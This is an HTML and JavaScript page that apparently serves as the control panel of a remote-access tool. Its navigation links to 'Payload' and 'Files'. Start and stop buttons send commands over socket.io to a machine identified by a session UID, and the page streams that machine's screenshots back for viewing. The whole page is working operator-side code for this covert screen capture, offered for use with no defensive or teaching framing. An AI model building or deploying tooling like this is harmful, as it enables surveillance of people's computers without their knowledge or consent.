<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Screen</title>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/socket.io/3.0.4/socket.io.js" integrity="sha512-aMGMvNYu8Ue4G+fHa359jcPb1u+ytAF+P2SCb+PxrjCdO3n3ZTxJ30zuH39rimUggmTwmh2u7wvQsDTHESnmfQ==" crossorigin="anonymous"></script>
    <style>
        body {
            font-family: 'Arial', sans-serif;
            margin: 0;
            padding: 0;
            background-color: #1e1e1e;
            color: #ccc;
            display: flex;
            flex-direction: column;
            align-items: center;
        }
        header {
            width: 100%;
            background-color: #333;
            padding: 20px 0;
        }
        nav {
            display: flex;
            justify-content: center;
        }
        nav ul {
            list-style-type: none;
            margin: 0;
            padding: 0;
            display: flex;
        }
        nav li {
            margin: 0 10px;
        }
        nav a {
            color: #fff;
            text-decoration: none;
            padding: 10px 15px;
            border-radius: 5px;
            transition: background-color 0.3s;
        }
        nav a:hover {
            background-color: #444;
        }
        .active {
            background-color: #555;
        }
        h1 {
            text-align: center;
            padding: 20px;
            width: 100%;
            margin: 0;
        }
        button {
            background-color: #444;
            color: #fff;
            border: none;
            padding: 10px 20px;
            margin: 10px 5px;
            border-radius: 5px;
            cursor: pointer;
            transition: background-color 0.3s;
        }
        button:hover {
            background-color: #555;
        }
        #capturedImage {
            max-width: 90%;
            margin: 20px 0;
            border-radius: 10px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
        }
    </style>
</head>
<body>
    <header>
        <nav>
            <ul>
                <li><a href="/" class="active">Control Panel</a></li>
                <li><a href="/payload">Payload</a></li>
                <li><a href="/files">Files</a></li>
            </ul>
        </nav>
    </header>

    <h1>Captured Image</h1>
    <button id="start">Start</button>
    <button id="stop">Stop</button>
    <img id="capturedImage" alt="Captured Screenshot" />

    <script>
        var socket = io();
        socket.connect(window.location.origin);
        const pageSID = window.location.pathname.split('/')[2];

        const startButton = document.getElementById('start');
        const stopButton = document.getElementById('stop');

        startButton.addEventListener('click', () => {
            socket.emit('screen_status', {"status": "start", "uid": pageSID});
        });

        stopButton.addEventListener('click', () => {
            socket.emit('screen_status', {"status": "stop", "uid": pageSID});
        });

        socket.on('screenshot', function(response) {
            if (response["uid"] == pageSID && response['image']) {
                const imageData = response['image'].data || response['image'];
                const byteArray = new Uint8Array(imageData);
                const blob = new Blob([byteArray], { type: 'image/jpeg' });
                const imageUrl = URL.createObjectURL(blob);
                document.getElementById('capturedImage').src = imageUrl;
                setTimeout(() => URL.revokeObjectURL(imageUrl), 1000);
            }
        });
    </script>
</body>
</html>
